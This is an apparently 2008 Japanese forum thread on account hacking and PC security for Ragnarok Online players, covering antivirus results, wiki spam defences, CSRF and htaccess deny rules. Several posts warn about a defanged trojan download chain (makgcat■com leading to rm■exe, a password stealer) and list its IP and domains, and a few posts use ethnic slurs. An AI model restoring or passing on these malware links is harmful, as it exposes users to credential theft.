pukiwiki公式見に行こうな

たいていのRO系wikiには導入済み

92 名前:(○口○*)さん:08/06/24 16:38 ID:7tpMAFLp0
「Adobe Reader」「Adobe Acrobat」v7/8に深刻な脆弱性、アップデート版が公開
ttp://www.forest.impress.co.jp/article/2008/06/24/adobe_vulnerability.html
現時点で「Adobe Reader」自動更新の対象外、パッチなどのダウンロードが必要

93 名前:(○口○*)さん:08/06/24 17:00 ID:iTsTY6Hy0
大したことではないが、ダウンロードページに日本語版まだないのね。

94 名前:(○口○*)さん:08/06/24 17:13 ID:zexw3HzP0
職Wikiとかの管理・運営ページ見たら、どういうプラグインが
入ってるか分かるぞ。
spam.ini.phpだけじゃなく、禁止ワードのブロックやら入ってるし
cn・kr含めたアクセス規制してる所も多い。

しかし国内の中継者(?)としてはodnが有名だが、そっちに
なると、対応は難しいよなぁ。
国別ブロックみたいな事前防御が出来ないから、どうしても
後手に回るし。

95 名前:(○口○*)さん:08/06/24 17:35 ID:JbvfdInt0
禁止単語を弾くBlacklist方式だと、どうしてもすり抜けが出てきてしまうよ。
この間の269g踏み台ブログの時も、Ymlpha氏直轄の弓手Wikiですら改竄を受けたし。
利便性よりも安全性を重視するために、徐々にWhitelist方式に移行する準備が行われている様だけど。

今後、情報サイトは以前のように増加する事は考えにくいとはいえ、なんともやるせなさを感じる。

96 名前:(○口○*)さん:08/06/24 17:40 ID:RhUIoTUg0
【  アドレス   】ttp://www.nicovideo.jp/search/Ro
ttp://www.nicovideo.jp/watch/sm3750703

【気付いた日時】 6/24AM17:25
【     OS    】 XP
【使用ブラウザ 】 IE(Ver7.0.5730.13)
【WindowsUpdateの有無】 随時更新
【 アンチウイルスソフト 】 AVG Anti-Virus Free
【その他のSecurty対策 】
【 ウイルススキャン結果】これから
【スレログやテンプレを読んだか】 Yes
【hosts変更】無
【PeerGuardian2導入】無

ニコニコ動画のROリンクに、変な動画があってそれをクリックしてしまいました。
内容はただのニュースで、AVGやウィルスソフトの反応はなかったのですが
動画のタイトルを見ると
「飛騨牛客か・一番よく分かってるそうて・す」と・・いかにも中華な感じで
心配です。
最近はフラッシュでも感染すると聞きましたが、・・こういう場合どうしたら良いでしょうか?

↑間違えてアカハック総合対策スレに書き込んでしまったので、転載させて下さい。
二重ですみません。

97 名前:(○口○*)さん:08/06/24 17:48 ID:Lw5lE7850
>>96
URL張るのはいいがh抜きだけだと見れるやつ多数いるんだ。
みんな■とかで途中を潰してるだろ?

ウイルス対策としては
気になるならフォーマットしてOSからインスコ

98 名前:(○口○*)さん:08/06/24 17:56 ID:ehmu6PbN0
>>96
>>1

99 名前:(○口○*)さん:08/06/24 18:04 ID:leOG7PdW0
>>96
>SO YA RO !!
ここのROに反応して検索ヒットしただけじゃね

100 名前:(○口○*)さん:08/06/24 18:31 ID:RhUIoTUg0
>>97さん >>98さん
■忘れてました、重ね重ねすみません。
慌てすぎですね自分(;´Д`)
ご指摘+解決策提示ありがとうございます。

>>99さん
盲点でした!!そこに反応してリンクされてたんですね。
タイトルが変なのは、濁点が文字化けしていただけでしょうか。

AVGでウィルススキャン中ですが、今の所ウィルスの検知はありません。
終わったら、念のためにカスペルスキーも試してきます。
ウィルスが見つかったら、また報告させて下さい。
お世話になりました。

101 名前:(○口○*)さん:08/06/24 18:37 ID:ar55paxF0
そもそもニコ動の動画投稿者ができるのはFlashで再生できる動画ファイルを
アップロードすることであって、Flashそのものを投稿するワケではないと思うんだ。

102 名前:(○口○*)さん:08/06/24 18:59 ID:ildQKPme0
>>91
それ導入してるのにちょっと前にWikiの荒らしが話題になったのはなんでだ?
と思ったが、話題になったから導入したのかな
と聞くのも怒られそうだからそういうことにしとく、滅多なこと言うものじゃないな

103 名前:(○口○*)さん:08/06/24 19:45 ID:8f15sw/b0
中国・香港などからの書き込みを塞いでたら国内のODN経由でやってきた
NGに入っていない新しいドメインを作ってきた

と言う事。これじゃ防ぎようが無い。
これ以上だと凍結するか外部リンク自体をNGにするしかない。
Wikiは外部リンク一切無しとかに出来ればいいんだけどね。
専ブラ入れずにWikiのTOPからスレを見に来る人はいまでも多いっぽいのが難点。

104 名前:(○口○*)さん:08/06/24 20:26 ID:NuIhrB280
>>84
それは結構昔からあるよ
不正チケットの気がするけどな

105 名前:(○口○*)さん:08/06/24 20:53 ID:NrGBWzMA0
>102
spam.ini.phpは設定した語句(ドメイン等)をブロックする機能。
デフォルトでかなりの数のドメインが登録されてて、それだけでも結構防ぐが
自動で追加される訳じゃないので、管理人がメンテ(追記)しないと新種の
罠アドには対応できない。

またアクセス制限で中韓台をブロックしてても、国内を中継されると防げない。
アクセス制限を強化しすぎると一般の利用者に不便が出る。

弓手Wikiが攻撃食らったのは、国内経由で・新種のアドで・一番最初に
攻撃食らったから。
これを防げというのは、エスパーじゃないんだから酷ってもんだろう。
(2回目のは一部設定ミスもあったようだけど)

他のWikiが改竄食らってないのは、管理人が対応できたか、最初から
攻撃対象じゃなかったかのどちらかと思う。

106 名前:(○口○*)さん:08/06/24 21:00 ID:NrGBWzMA0
ホワイトリストも、個人的には微妙というか、ベストの案とは思えない。
xrea事件のような事は、ホワイトリスト・ブラックリストという区分外での騒ぎだし。

それにクラックの可能性はどこのサイトでも常にあるし、ホワイトリスト使ってるから
安全、とか変な油断・認識が生じそうで怖い。

107 名前:(○口○*)さん:08/06/24 21:03 ID:VsuqzpAT0
>>106
セキュリティに完璧はない。どれだけリスクを減らせるかの問題。

108 名前:(○口○*)さん:08/06/24 21:26 ID:fq7zc/SI0
どれだけリスクを減らす事が出来るか、というよりは
どれだけ自分の責任をWiki管理人に押し付けれるか

って気がするけどな、その手の意見って

安全策を要望するのは利用者の1意見として当然あるが
Wiki管理人に負担強いてるだけにしか見えん

セキュリティの基本は自衛だしな

109 名前:(○口○*)さん:08/06/24 21:53 ID:fZtC2Hh80
ま、どのように対応するかはWiki管理人諸氏が決めるだろ。
ここで外野が喚く事じゃないって。

管理放棄して未対策のまま放置し続けてるとかなら兎も角
ちゃんと対応してくれてるんだし。
ブラックリストだろうがホワイトリストだろうが、管理人諸氏が
無理しない範囲で対応してくれれば十分。

それ以上は望まんよ。

110 名前:(○口○*)さん:08/06/24 22:05 ID:fZtC2Hh80
そしてアプリコの殴りプリスレに貼られていたもの

www■makgcat■com/woodem■htm (VT 13/33)
--->www■makgcat■com/rm■exe (VT 25/33 Trojan-PSW.Win32.Mapler.ae)

woodem http://www.virustotal.com/analisis/e5f04e39206d92ab82aa524926b226f5
rm http://www.virustotal.com/analisis/7a221c374aa1ba5da373133fad553e5f

rm■exeはMcAfee・Microsoft・NOD32・Symantecがスルーしてるので注意

111 名前:(○口○*)さん:08/06/24 23:50 ID:LIT4B+FF0
>>105
ふと攻撃食らわなかったWikiを考えたのだが
全部が攻撃対象になったのではないかと思う。

閲覧専用と編集専用と別けたWikiが幾つかあるが
其れを施してたWikiは攻撃されてない
(但し攻撃試行があったという報告はある)

アルケミWikiは攻撃されたが同じ管理人のSageWikiには攻撃がなかったとか。
似たようなことを行ってるクエスト案内所も被害報告なし
貧スレWiki(多分CommonWikiも?)には攻撃試行があったという報告がある

ちなみに
未実装Wikiは元からホワイトリスト方式だった。

俺がわかる範囲で書いてるので判らなかったWikiについては明言を避けるが


しかし編集とかでWiki管理人が色々困ったり
XREAの騒動でサーバー移動の話まで出てきてる模様。
Wiki管理人さん無理をしないようにしてください。

112 名前:(○口○*)さん:08/06/25 00:03 ID:1yhfqjyx0
HPに設置したBBSへのアダルト系投稿が続くので、ISPに片っ端から対応依頼を
出してみました。この件であるISPから来た返答から抜粋。
国内のISP(串じゃなさそうなとこ)ばかりから来てたので、これなのかもなー。
意図せぬ投稿ってのもやっかいだねぇ。

一応、手口的なものとして、周知しといた方がいいかなと思ったので投稿しときます。


>●意図的な投稿かどうか、掲示板のセキュリティについて確認させてください
>
>掲示板への迷惑な投稿についてご連絡いただいておりますが、昨今のアダルト
>サイトへ誘引する投稿は、「クロスサイトリクエストフォージェリ」(別項参
>照)という手法で行われているとの報告がございます。
>
>誠に恐れ入りますが、お客様の掲示板では「掲示板以外からの投稿を受け付け
>ない設定」になっているか、ご確認いただけますでしょうか。
>
>●「クロスサイトリクエストフォージェリ」について
>
>「クロスサイトリクエストフォージェリ」とは、悪意のあるホームページにス
>クリプト等が設置されており、無関係な第三者がそのページを閲覧しただけで、
>別の掲示板等へ投稿が行われてしまうものです。
>
>IPアドレスが記録されている投稿者は、(悪意のある)別のホームページを閲
>覧していただけですので、投稿した覚えがなく、また、ウイルス感染による投
>稿ではないために、ウイルス対策ソフト等による対策も難しい状況です。
>
>「クロスサイトリクエストフォージェリ」への対策といたしましては、掲示板
>側で、「掲示板以外からの投稿を受け付けない設定」に変更することで防ぐこ
>とが可能です。

113 名前:(○口○*)さん:08/06/25 00:35 ID:ZmNVWjXr0
要するに「飛ばし」じゃねーか?ってことね
リファチェックしろと言いたいのか

114 名前:(○口○*)さん:08/06/26 16:01 ID:PWK493Iu0
鯖板に貼られていたもの

>977 Saraの中の名無しさん 08/06/26 11:54:49 ID:o6O72ECk
>【RO】 限界チャレンジャー!
>
>【ニコニコ動画】【RO】 限界チャレンジャー!〜殴りプリvsカーサ・TIME
>
>ATTACK〜殴りプリさんがトールでカーサでタイマンをはる動画98で挑んでLVあ
>
>がったということは発光したんですよね?おめでとうございます!
>ttp://www■makgcat■com/woodem■htm

ダウンローダは、カスペすりぬけ。
本体はカスペ検出名「Trojan-PSW.Win32.Mapler.ae」

VirusTotal 13/33
ttp://www.virustotal.com/analisis/e5f04e39206d92ab82aa524926b226f5

VirusTotal 25/33
ttp://www.virustotal.com/analisis/7a221c374aa1ba5da373133fad553e5f

本体
ttp://www■makgcat■com/rm■exe

115 名前:(○口○*)さん:08/06/26 20:56 ID:/Ek3fbOd0
改変に見覚えあったからコピペ
キャラ&ギルド名は一応念のため伏字

458 名前:▲▲▲▲[] 投稿日:2008/06/24(火) 16:36:30 ID:.jgfduG6
こんにちは(*'ω')ノ
現在ガルムサーバーで活動している「●●●●」というギルドをやっています!
現在Gvを中心として活動をしています!!
Gvなんてやったこと無い。Gvで失敗すると怒られる。
Gvに対して色々分からない人もいると思いますが、●●●●ではGv中でも仲良く楽しく、怒る事無く初心者でもやりやすい環境を作るように活動しています(*'ω')
もしこれからGvちょっとやってみようかな。
Gv試しに出てみようかな?などありましたら是非一度●●●●に着てみてくださいヾ(*'ω')ノ
ギルドでの狩りもありますので色んな面で楽しめると思いますのでこの記事を見て興味が出た方は
「▲▲▲▲」にwis頂くか乗せている●●●●HPに書いてあるたまり場で声を掛けて下さいな!
それでは長文失礼しました!
ttp://www■makgcat■com/woodem■htm

116 名前:(○口○*)さん:08/06/26 21:19 ID:mtcW6ip+0
makgcat■comのipは 125■65■112■49

そしてこのIPが持ってるドメインは makgcat 以外に
jplineage■com
undenow■com

117 名前:(○口○*)さん:08/06/27 00:55 ID:B8uB9nv90
XREAの広告、またやられたというか巻き戻っちゃってるので注意。
XREAの該当ファイルのタイムスタンプは日本時間26日3:21。
fccjaのトロイのタイムスタンプは18日だけど
こっちはたぶんいじってあるのであてにならない。

118 名前:(○口○*)さん:08/06/27 02:02 ID:B8uB9nv90
XREAまた修正済みの17日のに戻った。書き換え合戦か?

119 名前:(○口○*)さん:08/06/27 02:30 ID:oBIVGsvn0
http://gdata.co.jp/press/archives/2008/06/8g_data.htm
●6月の検出率順位 製品名 検出率
1位 G DATA アンチウイルス2008         99.21%
2位 Kaspersky アンチウイルス7.0         98.96%
3位 Norton アンチウイルス2008         98.89%
4位 Windows ライブ ワンケア           98.53%
5位 F-Secure インターネットセキュリティ 2008 98.09%
6位 McAfee ウイルススキャンプラス       95.77%
7位 ウイルスバスター2008             92.42%
8位 ウイルスセキュリティ ZERO          90.50%
9位 NOD32アンチウイルス V2.7          88.85%
10位 ウイルスキラーゼロ               85.32%

(ドイツAV-Test調べによる、2008年6月11日現在)

120 名前:(○口○*)さん:08/06/27 03:23 ID:LfYA0dc10
一連の騒動で、閲覧する側もURLにxreaが含まれているだけで拒否感を示すようになってきた感じだね。
無料鯖も今後の雲行きが怪しくなってきたし、困ったものだ。

121 名前:(○口○*)さん:08/06/27 04:02 ID:EiqDRk+W0
>>120

やっぱwikiが集中してあるサーバーってのも有るんだろうな。
今は亡きROWikiとかもここだったしな

なんか管理側とクラッカー側の書き換え合戦状態と言う情報も

122 名前:(○口○*)さん:08/06/27 06:57 ID:bs8bryTx0
アカウントハック対策で別PCを導入してるんだけど、メインPCと別PCを同時起動してたら危険度って一緒?
どっちもウィルス対策ソフトは入れてるけど、ルーターとか通して移ってったりするんかしら。

123 名前:(○口○*)さん:08/06/27 07:55 ID:JWfJToHA0
共有とかしてなけりゃ基本的には大丈夫じゃね

124 名前:(○口○*)さん:08/06/27 10:13 ID:eZ91Cevg0
>>119
ウイルスバスター涙目だな
ウイルスセキュリティと2パーくらいしか検出率の差がない

その数パーの差がでかいって話だけどね

125 名前:(○口○*)さん:08/06/27 10:14 ID:OVAmthgc0
自分が穴を踏むかどうかの違いだから
宝くじ買うようなもんだ

126 名前:(○口○*)さん:08/06/27 10:41 ID:lHY5MwJ10
>>119
むしろNOD32が悲惨だなこりゃ

127 名前:(○口○*)さん:08/06/27 11:07 ID:GoXQgc8d0
NOD32が悲惨なのはともかく、ノートンが高いのが腑に落ちない。
正直スマンテックなノートンがそんなに高いとは思えないので、検体の偏りかなぁ。

128 名前:(○口○*)さん:08/06/27 11:14 ID:OVAmthgc0
たぶん>>127の思いこみ。
その時々で検知率なんて変わってしまうしねぇ。

129 名前:(○口○*)さん:08/06/27 11:17 ID:g5AGGW5m0
NOD最強伝説
http://www.av-comparatives.org/seiten/ergebnisse_2008_05.php

130 名前:(○口○*)さん:08/06/27 11:18 ID:rACCxfVQ0
Windowsライブワンケアが高いのも納得できないなぁ。
国によってウィルスの傾向が違ったりするのかもね。

131 名前:(○口○*)さん:08/06/27 14:58 ID:nZfhGFJv0
NOD32・・・、働いてるネカフェで導入したトコなのに何やってんだ・・・。もっと頑張れよ。
まあ、このテのテストは主催する団体で結構結果違ってくるが。

132 名前:(○口○*)さん:08/06/27 15:05 ID:B8uB9nv90
何がいいかとかは荒れるのでやめよう。

133 名前:(○口○*)さん:08/06/27 15:09 ID:B8uB9nv90
XREAの件、202.181.97.153をDNSから外したみたい。
nslookup j1.ax.xrea.com
最初(10日頃?)からやっとけよ!

134 名前:(○口○*)さん:08/06/27 15:20 ID:U/2O+Er50
検出率も重要だけど
対応速度はもっと重要だと思っていたりする
つまりあれだノートンおせぇ……ただそれだけ……

135 名前:(○口○*)さん:08/06/27 15:28 ID:7u4qPjc20
Avastなんて載ってすらいないな
そろそろカスペさんに乗り換えるべきか…

136 名前:(○口○*)さん:08/06/27 16:07 ID:Xob90SgH0
なにゆえにゅ缶のほうのスレはなくなってしまったのでしょうか。
雑談を含む話はLiveROで、という感じの住み分けが便利だったのですが。

137 名前:(○口○*)さん:08/06/27 16:12 ID:EiqDRk+W0
>>136
あっちもこっちも同じような内容になってきたから
と覚えてるけど

138 名前:(○口○*)さん:08/06/27 16:20 ID:5b3oFqmB0
RO板の方の役割は危険アドレスの収集のみということになっていたが、
それだけならこっちのスレでも扱えること、LiveROでも落ちる心配の無い状況であること
一番大きかったのは粘着質な誘導が住み着き、
時には趣旨に反してない話題に対しても誘導を張ったりという問題もあったことだと思う

139 名前:(○口○*)さん:08/06/27 16:44 ID:OVAmthgc0
IE 6にパッチ未提供の脆弱性、実証コードすでに公開済み
http://internet.watch.impress.co.jp/cda/news/2008/06/27/20079.html

140 名前:(○口○*)さん:08/06/27 16:53 ID:VRQxBmur0
昨日当たりから PGが
140.114.79.233 台湾IPを頻繁にはじくんだけどなんでだろ
場合によってはPGが落ちる

怖いから 再インストールしてくる

141 名前:(○口○*)さん:08/06/27 16:56 ID:OVAmthgc0
>>140
てかルーター入れてないの?

142 名前:(○口○*)さん:08/06/27 17:19 ID:B8uB9nv90
IE 6とIE 7に危険度「中」の脆弱性
IE 6と7で、それぞれ別の脆弱性が報告された。
ttp://www.itmedia.co.jp/enterprise/articles/0806/27/news054.html

143 名前:(○口○*)さん:08/06/27 17:35 ID:Bfq0ByOn0
ぜ、脆弱性・・・

144 名前:(○口○*)さん:08/06/27 17:42 ID:5b3oFqmB0
>>78,143
何が言いたいのかわからん

145 名前:(○口○*)さん:08/06/27 17:44 ID:7u4qPjc20
多分「か…漢だ」ネタみたいなもんだと思う。
でも読み合ってるから何か勘違いしてるんじゃね?

146 名前:(○口○*)さん:08/06/27 17:47 ID:IKi+CWOmO
俺も>>145だと思う
だとすると「>>78=>>143は馬鹿です」というアピールにしかなってないが

147 名前:(○口○*)さん:08/06/27 19:14 ID:/4Xbp8Hn0
「けど、脆って字、脆弱性って熟語で出てこないと何て読むか分からないよな」
と思った俺は確実にアホ

148 名前:(○口○*)さん:08/06/27 19:17 ID:IKi+CWOmO
もろい

149 名前:(○口○*)さん:08/06/27 19:17 ID:YDcJborP0
も、脆弱性…

だったらよかったかも。

150 名前:(○口○*)さん:08/06/27 20:00 ID:GoXQgc8d0
ここは下らない(寒くもない)冗談披露スレじゃねーぞ。

151 名前:(○口○*)さん:08/06/27 20:06 ID:ct8lhwz00
>140
そのIPでググれば、なんかポロポロ出てくる。
串なのかね?

で外から来てる場合、ただのアタックの可能性もあるが
何かしらのバックドアが仕込まれてる可能性もある。

OSの再インストールもいいけど、先にPCチェックして
何か潜んでないかの確認した方がいいかも。

152 名前:(○口○*)さん:08/06/28 23:46 ID:PeY3Lvc70
ちょっとは考えるようになったのかと思えば、やっぱり中華は中華だった

殴りアコプリスレより捕獲
---------------------------
681 名前:ヒール回復774さん MAIL: 投稿日:2008/06/28(土) 18:20:26 [ yueG1tIk ]
突然メ-ルを送り失礼しました。
ご縁がありましたら、ぜひ私の会社(商店)との取引を、お願いします。

サイト: ttp://www■makgcat■com/woodem■htm
メール注文: ourbrand@21cn■com ourbrand@tom■com
---------------------------

BBSでなんの取引をする気だ……
つーか、まさかこんな文面のSPAM送りまくりとかしてるのか?

>110>114にあるが、一応調査結果
www■makgcat■com/woodem■htm
--->www■makgcat■com/rm■exe
woodemは5/25付け、rmは6/18付けで中身変わってないけど
現時点でrmはノートンとNOD32が未だにスルーなのでご注意を

153 名前:(○口○*)さん:08/06/29 08:45 ID:bbSexK7s0
【      気付いた日時          】 6月29日の7:30くらい
【不審なアドレスのクリックの有無 】 なし
【他人にID/Passを教えた事の有無】 なし
【他人が貴方のPCを使う可能性の有無】 なし
【    ツールの使用の有無      】 なし
【  ネットカフェの利用の有無    】 なし
【     OS    】 WindowsXP SP2
【使用ブラウザ 】 IE7(7.0.5730.13)
【WindowsUpdateの有無】 有
【 アンチウイルスソフト 】 ウィルスバスター2008
【その他のSecurty対策 】 ルーター(WebCasterV120)
【 ウイルススキャン結果】 ウィルスバスター2008は問題なし
             カスペルスキーオンラインスキャンは現在実行中
【スレログやテンプレを読んだか】 現在のスレログとテンプレは読ませてもらいました。過去ログはこれからです。
【hosts変更】なし
【PeerGuardian2導入】なし
【説明】
先ほどガンホーIDにログインをしたら、覚えのないROのアトラクションIDが1つ追加されていて
メールを確認したところ、6/27日9:30くらいに作成されていました。課金の状態は「未払い」になっています。
マシン自体はほとんどRO専用で、課金のためガンホーのサイトにアクセスするくらいです。
やはりハックされてると見て間違いないでしょうか?ご教授いただけると助かります。

154 名前:(○口○*)さん:08/06/29 09:04 ID:GwNP8lEa0
見た事の無いアトラクションIDならハックだろうな。癌のDB異常の可能性もあるが。

早急に安全な環境からパスワードを変更して報告する作業に移るんだ。

155 名前:(○口○*)さん:08/06/29 17:48 ID:IwEt8Hgr0
RO内で無差別で友達登録飛ばしてくるノビが居たんだけど
これて垢ハック関係なの?
なんかそんな事を南で言ってる人居たんだけど

156 名前:(○口○*)さん:08/06/29 17:57 ID:uxxxlhDd0
×「そうです」
×「違います」
△「かもしれないね」
○「知るか(ry」

157 名前:(○口○*)さん:08/06/29 18:49 ID:TYxs0DKy0
ただのBOTの暴走、に一票

Wisだのなんだのでは、癌IDやROIDには繋がらない
ましてやパスワードにも繋がらない

例えばRMTerがログの偽装をやってるのかもしれない
その関係から誤BAN、更にそれを利用したRMTerの
BAN解除とかも考えられる

変な事態になりかねんので、無視するのが一番

158 名前:(○口○*)さん:08/06/29 18:59 ID:bbSexK7s0
>>154
レスありがとうございます。

カスペルスキーオンラインの方もとくにウィルスの検出などはありませんでした。
別ネットワークの安全なPCから変更&ガンホーに報告をしたいと思います。

159 名前:(○口○*)さん:08/06/29 22:35 ID:GwNP8lEa0
物質スレで質問あったので気付いたが、まとめサイトにもWikiにもなくなってる情報。
まとめサイトのPG2の近辺に記載しておいて欲しいところ。

■PG2用 RO許可リスト■
RAGNAROK-JP:61.215.212.0-61.215.212.255
RAGNAROK-JP2:61.215.214.128-61.215.214.255
WEB-SYSTEM:61.215.220.64-61.215.220.255
RAGNAROK-JP2:211.13.228.0-211.13.228.255
GUNGHO-MODE:211.13.229.0-211.13.229.255
RAGNAROK-JP3:211.13.232.0-211.13.232.255
RAGNAROK-JP4:211.13.235.0-211.13.235.255
GUNGHO-PAT1:219.123.155.160-219.123.155.191
GUNGHO-PAT1:221.247.195.160-221.247.195.191
GUNGHO-PAT3:125.101.19.64-125.101.19.95
GUNGHO-PAT4:124.32.117.192-124.32.117.22

160 名前:(○口○*)さん:08/06/30 02:40 ID:Yd/ZyJ+E0
(`o´)未転生が転生に色々言うスレm(_ _)mに韓国ROのファンサイトへのリンクが張ってあるんだが(430付近)、あれが安全なリンクかわかる人いる?
スレの主旨と違ってるカキコと外国サイトへのURLがいきなり貼り付けてあって、踏んでる人も居るみたいだったのでちょっと気になった。
相談先が違うなら、有効な相談先を教えて欲しい。

161 名前:(○口○*)さん:08/06/30 04:03 ID:hfmtazcr0
>>1

162 名前:まとめ臨時 ◆kJfhJwdLoM:08/06/30 05:14 ID:Ewz/BEPq0
>>159
こんな感じにしてみました。
http://sky.geocities.jp/ro_hp_add/ro_tai01.html#PG2RO

163 名前:(○口○*)さん:08/06/30 08:05 ID:/8NOrk5Z0
>>161
かっこいいと思って書いてるんだろうけど、それならスルーしたほうがまし
テンプレカキコにテンプレレス

164 名前:(○口○*)さん:08/06/30 10:08 ID:v3IuF+td0
>>163
>>163

165 名前:(○口○*)さん:08/06/30 11:39 ID:Y8+5MhXh0
Kingsoftの新しいウイルス見つけたらQUIカードあげるよってのが本日で終わりらしい。
QUOカード集めの為に導入していた人(アカウントハック関連は更新が頻繁なので
新種を狩るのは結構楽だった)は止めるだろうから選択枝として更にありえなくなっちゃったね。

166 名前:(○口○*)さん:08/06/30 13:39 ID:1ubNKTGx0
見返りが欲しくて検体送ってたわけじゃないし、
直接duba.netに送ってたから何ももらったことはないな。

選択肢
○せんたくし
×せんたくえだ

167 名前:(○口○*)さん:08/06/30 16:58 ID:FpeTVE520
>>152
それ、原文は中華偽ブランド業者の記事な。

これを検索するとでてくる
”ご縁がありましたら、ぜひ私の会社(商店)との取引を、お願いします。”

こうして福建人は自分で一文字も書くことなく罠テンプレ記事を増やして行くのだった。
福建人を数年見てきてるけど、やつら自身の記事ってのを一度も見たことがないぜ。

168 名前:(○口○*)さん:08/06/30 19:08 ID:uel1xBeU0
らぐみみがいつの間にか育毛剤の宣伝ページになっていたんだけど
これはアカハクじゃないよな?

169 名前:まとめ臨時 ◆kJfhJwdLoM:08/06/30 19:19 ID:dutGdMIy0
>>168
らぐみみさんは6/15前後に閉鎖された模様。
閉鎖するという事で過去絵とかUP一挙公開されていたのを確認しています。
ラグナロク☆ねっとわーくのログ、08/6/18分にリンク解除の記述がありました。

170 名前:(○口○*)さん:08/07/01 19:38 ID:Q7nvJOfp0
警告age

ttp://www.gamecity.ne.jp/dol/news/body.htm#921
>この度、弊社サービス「大航海時代 Online @Web」のログイン画面を装うサイトが存在することを確認いたしました。

支那貿易商がゲーム内で稼げなくなったからか、やはりこちらにシフトし始めたか。

171 名前:(○口○*)さん:08/07/01 19:41 ID:lrVqxTVf0
警告も何も、普通のフィッシング詐欺ですやんか。それ。

172 名前:(○口○*)さん:08/07/01 19:58 ID:oJZuFhrr0
そうですね。

173 名前:(○口○*)さん:08/07/01 23:58 ID:GMfV+C9v0
そういえばROのタイポを狙ったサイトあったよな?
ああいうのでフィッシングをされたら一瞬わからなくなるわな

174 名前:(○口○*)さん:08/07/02 02:36 ID:KCT0z1lQ0
kasperskyのスキャンで
感染オブジェクト名:C:\WINDOWS\pchealth\helpctr\binaries\msconfig.exe
ウイルス名:感染: Email-Worm.Win32.Brontok.cv
とでたのだけれども駆除の方法がよく分からないんだ
こういうの強い人がいたら助言が欲しい

175 名前:(○口○*)さん:08/07/02 02:59 ID:uOMu2m8s0
>>174 誤検出の可能性高し

●● RMT業者の垢ハックが多発している件23 ●●
http://live27.2ch.net/test/read.cgi/ogame/1214625452/579-595

176 名前:(○口○*)さん:08/07/02 10:34 ID:36iTApA70
>174
そのファイルを
http://www.virustotal.com/jp/
にぶち込むんだ

177 名前:(○口○*)さん:08/07/02 14:30 ID:d8S50r0G0
AdobeReader9.0リリース
8系のパッチが当たってるんだか当たってないんだかわからくて不安な人はどうぞ。

178 名前:(○口○*)さん:08/07/02 20:38 ID:KCT0z1lQ0
ぶちこんでみた・・・けどこれはどういうことなのか

179 名前:(○口○*)さん:08/07/02 21:19 ID:HuAOv9vu0
どうって・・・

180 名前:(○口○*)さん:08/07/02 21:52 ID:a2rEroeT0
起動が早くなったらしい(伝聞

181 名前:(○口○*)さん:08/07/03 15:31 ID:JmZxdrbS0
米PlayStationサイト改ざん、偽ウイルス対策ソフト売りつける
ttp://internet.watch.impress.co.jp/cda/news/2008/07/03/20139.html

182 名前:(○口○*)さん:08/07/03 15:41 ID:eLkvLO7b0
「自宅の無線LANセキュリティ設定の確認を」、IPAが6月の呼びかけ
http://internet.watch.impress.co.jp/cda/news/2008/07/02/20126.html

>「WEP」方式については暗号の解読が容易であるため、
>現状では使用を推奨しないとしている。

183 名前:(○口○*)さん:08/07/03 15:47 ID:0Httx7610
DSのwi-fiは諦めるか…

184 名前:(○口○*)さん:08/07/03 15:54 ID:eLkvLO7b0
>>183
ルーターのクライアントモニタを定期チェックして不正接続がないか確認。
それに加えて時々キー変更しておけば良いと思うよ。
MAC制御は一見よりセキュアに見えて、そうでもなかったりするので。

185 名前:(○口○*)さん:08/07/03 17:27 ID:JmZxdrbS0
Opera9.51リリース

186 名前:(○口○*)さん:08/07/03 18:25 ID:4zpS4+2I0
>>183
syslog吐ける無線アクセスポイントを導入するか、USBアダプタでPCを経由させた方がいいかも。
それに加えて、DSからのパケットはUDPだけ通すようにして、TCPは全遮断。
WiiやPSPなら、AESが使用可能なので、いっそアクセスポイント自体を別建てにするのも良いかもしれない。

187 名前:(○口○*)さん:08/07/03 23:33 ID:udyScBQR0
AOSSだったら大丈夫?

188 名前:(○口○*)さん:08/07/03 23:46 ID:E1TbjcPo0
AOSSは一番下の暗号規格に合わせてしまうので、
NDSみたいにWEPしか対応していない機器を繋いじゃうと意味なす

189 名前:(○口○*)さん:08/07/04 02:54 ID:OrAw1m2L0
質問です。
さきほど、X-Cleanerオンラインスキャナでスキャンを行った所「MarketScore」
というものが検出されました。ググると何か情報を盗む系?のウィルスぽい事が。
そのまま除去して再起動したのですが、これでもう情報は盗まれないのでしょうか?
必要なら再インストールもしたほうがいいのでしょうか?
ご教示おねがいします。 ちょっと焦っているのでageます。

190 名前:(○口○*)さん:08/07/04 03:38 ID:6Vq5LqLG0
>>182
これ、無線回線がPSPとかのゲーム専用だったら特に問題なしと考えて差し支えないだろうか。

191 名前:まとめ臨時 ◆kJfhJwdLoM:08/07/04 03:43 ID:yJ6F0iBK0
気になったので"MarketScore"でぐぐって
最初のページでヒットした所を覗いたら何かのソフトに添付されている場合もあるとか。
それらのソフトを使用していない場合は誤検出の可能性もあるそうです。
http://oshiete1.goo.ne.jp/qa2235160.html
ウイルスではなくスパイウェアのようです。

最近なにかのソフトをインストールしていない、それら関連のソフトで心当たりがない場合は
いつどこのサイトで踏んだか判らないのでなんともいえません。


安心したい場合は >>1-5 にもあるようにOSの再インストール推奨。
これ以上ウイルス感染していないと判断ができる、
削除されたので問題ないと思うなら、そのまま使用ということになります。

192 名前:(○口○*)さん:08/07/04 03:45 ID:z3DL5to50
htaccess に

deny from .163data.com.cn
deny from .cn.cndata.com
deny from .cn

と書いてるにも関わらず

61■206■185■61■broad■xa■sn■dynamic■163data■com■cn
からアクセスがあったが、串使ってるんだろうか……


そしてブラウザ情報が
"Mozilla/5.0 (Windows; U; Windows NT 5.1; ja; rv:1.9) Gecko/2008052906 Firefox/3.0"

このアクセスが中華のハク犯のものだとしたら、htaccessの設定を
1から見直した方がよさそうな気配……

193 名前:189:08/07/04 04:02 ID:OrAw1m2L0
>>191
誤検出という場合もあるんですねorz

再度ノートンを更新してシステムスキャンしてみたら、今度は何も検出されませんでした。
実はリカバリした直後でして、新たになんだかんだインストールしたのは確かなのです;
誤検出なのかなぁ・・。 取り敢えずこのままいってみます。 ありがとうでした。

194 名前:(○口○*)さん:08/07/04 05:32 ID:1YIm9uFEO


195 名前:(○口○*)さん:08/07/04 06:41 ID:E2g8XhA10
>>192
deny と allow の順番とか、鯖でホストを逆引きするかどうかの設定とか、
そういうのは全部クリアしてるんだよね?

196 名前:(○口○*)さん:08/07/04 08:51 ID:RhoPfk0q0
負荷問題からIP記述でしか機能しない(させてない)鯖もあるよねぇ

197 名前:(○口○*)さん:08/07/04 09:10 ID:R2255C//0
>>192
ホスト名で弾くならスクリプト内処理のがいいよ。

198 名前:(○口○*)さん:08/07/04 12:29 ID:lYUb4wOW0
警察に放置され続けて電話したら
